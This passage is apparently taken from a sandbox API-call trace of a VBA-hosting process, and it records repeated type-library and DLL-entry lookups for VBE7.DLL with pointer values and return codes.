cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3c60, pBstrName=0x0, pwOrdinal=0x33e4fb3c80 | out: pBstrDllName=0x33e4fb3c60*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3c80*=0x3ef0) returned 0x0 [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3c60, pwOrdinal=0x500000000) returned 0x0 [0060.577] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3d40, pIndex=0x0 | out: ppTLib=0x33e4fb3d40*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.577] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3d50, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3d50, pDummy=0x0) returned 0x0 [0060.577] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.577] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3d40, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3d40, pBstrName=0x0, pwOrdinal=0x33e4fb3d60 | out: pBstrDllName=0x33e4fb3d40*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3d60*=0x3fd0) returned 0x0 [0060.577] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3d40, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3d40, pwOrdinal=0x500000000) returned 0x0 [0060.578] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3e20, pIndex=0x0 | out: ppTLib=0x33e4fb3e20*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.578] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3e30, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3e30, pDummy=0x0) returned 0x0 [0060.578] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.578] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3e20, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3e20, pBstrName=0x0, pwOrdinal=0x33e4fb3e40 | out: pBstrDllName=0x33e4fb3e20*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3e40*=0x40b0) returned 0x0 [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3e20, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3e20, pwOrdinal=0x500000000) returned 0x0 [0060.578] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3f00, pIndex=0x0 | out: ppTLib=0x33e4fb3f00*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.578] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3f10, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3f10, pDummy=0x0) returned 0x0 [0060.578] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.578] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3f00, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3f00, pBstrName=0x0, pwOrdinal=0x33e4fb3f20 | out: pBstrDllName=0x33e4fb3f00*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3f20*=0x4190) returned 0x0 [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3f00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3f00, pwOrdinal=0x500000000) returned 0x0 [0060.578] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3fe0, pIndex=0x0 | out: ppTLib=0x33e4fb3fe0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.578] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3ff0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3ff0, pDummy=0x0) returned 0x0 [0060.578] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.578] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3fe0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3fe0, pBstrName=0x0, pwOrdinal=0x33e4fb4000 | out: pBstrDllName=0x33e4fb3fe0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4000*=0x4270) returned 0x0 [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3fe0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3fe0, pwOrdinal=0x500000000) returned 0x0 [0060.578] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb40c0, pIndex=0x0 | out: ppTLib=0x33e4fb40c0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.578] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb40d0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb40d0, pDummy=0x0) returned 0x0 [0060.578] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.578] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.578] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb40c0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb40c0, pBstrName=0x0, pwOrdinal=0x33e4fb40e0 | out: pBstrDllName=0x33e4fb40c0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb40e0*=0x4350) returned 0x0 [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb40c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb40c0, pwOrdinal=0x500000000) returned 0x0 [0060.579] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb41a0, pIndex=0x0 | out: ppTLib=0x33e4fb41a0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.579] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb41b0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb41b0, pDummy=0x0) returned 0x0 [0060.579] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.579] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb41a0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb41a0, pBstrName=0x0, pwOrdinal=0x33e4fb41c0 | out: pBstrDllName=0x33e4fb41a0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb41c0*=0x4430) returned 0x0 [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb41a0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb41a0, pwOrdinal=0x500000000) returned 0x0 [0060.579] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4280, pIndex=0x0 | out: ppTLib=0x33e4fb4280*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.579] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4290, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4290, pDummy=0x0) returned 0x0 [0060.579] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.579] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4280, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4280, pBstrName=0x0, pwOrdinal=0x33e4fb42a0 | out: pBstrDllName=0x33e4fb4280*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42a0*=0x4510) returned 0x0 [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4280, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4280, pwOrdinal=0x500000000) returned 0x0 [0060.579] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4360, pIndex=0x0 | out: ppTLib=0x33e4fb4360*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.579] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4370, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4370, pDummy=0x0) returned 0x0 [0060.579] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.579] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4360, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4360, pBstrName=0x0, pwOrdinal=0x33e4fb4380 | out: pBstrDllName=0x33e4fb4360*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4380*=0x45f0) returned 0x0 [0060.579] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4360, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4360, pwOrdinal=0x500000000) returned 0x0 [0060.579] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4440, pIndex=0x0 | out: ppTLib=0x33e4fb4440*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.580] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4450, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4450, pDummy=0x0) returned 0x0 [0060.580] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.580] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4440, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4440, pBstrName=0x0, pwOrdinal=0x33e4fb4460 | out: pBstrDllName=0x33e4fb4440*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4460*=0x46d0) returned 0x0 [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4440, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4440, pwOrdinal=0x500000000) returned 0x0 [0060.580] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4520, pIndex=0x0 | out: ppTLib=0x33e4fb4520*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.580] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4530, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4530, pDummy=0x0) returned 0x0 [0060.580] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.580] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4520, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4520, pBstrName=0x0, pwOrdinal=0x33e4fb4540 | out: pBstrDllName=0x33e4fb4520*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4540*=0x47b0) returned 0x0 [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4520, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4520, pwOrdinal=0x500000000) returned 0x0 [0060.580] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d5068, ppTLib=0x33e4fb4600, pIndex=0x0 | out: ppTLib=0x33e4fb4600*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.580] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4610, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4610, pDummy=0x0) returned 0x0 [0060.580] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.580] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4600, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4600, pBstrName=0x0, pwOrdinal=0x33e4fb4620 | out: pBstrDllName=0x33e4fb4600*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4620*=0x4890) returned 0x0 [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4600, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4600, pwOrdinal=0x500000000) returned 0x0 [0060.580] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3b80, pIndex=0x0 | out: ppTLib=0x33e4fb3b80*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.580] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3b90, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3b90, pDummy=0x0) returned 0x0 [0060.580] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.580] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.580] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3b80, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.581] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3b80, pBstrName=0x0, pwOrdinal=0x33e4fb3ba0 | out: pBstrDllName=0x33e4fb3b80*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3ba0*=0x3e10) returned 0x0 [0060.581] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3b80, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3b80, pwOrdinal=0x500000000) returned 0x0 [0060.581] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3c60, pIndex=0x0 | out: ppTLib=0x33e4fb3c60*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.581] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3c70, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3c70, pDummy=0x0) returned 0x0 [0060.581] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.581] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.581] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3c60, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.581] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3c60, pBstrName=0x0, pwOrdinal=0x33e4fb3c80 | out: pBstrDllName=0x33e4fb3c60*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3c80*=0x3ef0) returned 0x0 [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3c60, pwOrdinal=0x500000000) returned 0x0 [0060.582] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3d40, pIndex=0x0 | out: ppTLib=0x33e4fb3d40*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.582] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3d50, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3d50, pDummy=0x0) returned 0x0 [0060.582] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.582] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3d40, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3d40, pBstrName=0x0, pwOrdinal=0x33e4fb3d60 | out: pBstrDllName=0x33e4fb3d40*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3d60*=0x3fd0) returned 0x0 [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3d40, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3d40, pwOrdinal=0x500000000) returned 0x0 [0060.582] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3e20, pIndex=0x0 | out: ppTLib=0x33e4fb3e20*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.582] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3e30, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3e30, pDummy=0x0) returned 0x0 [0060.582] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.582] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3e20, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", 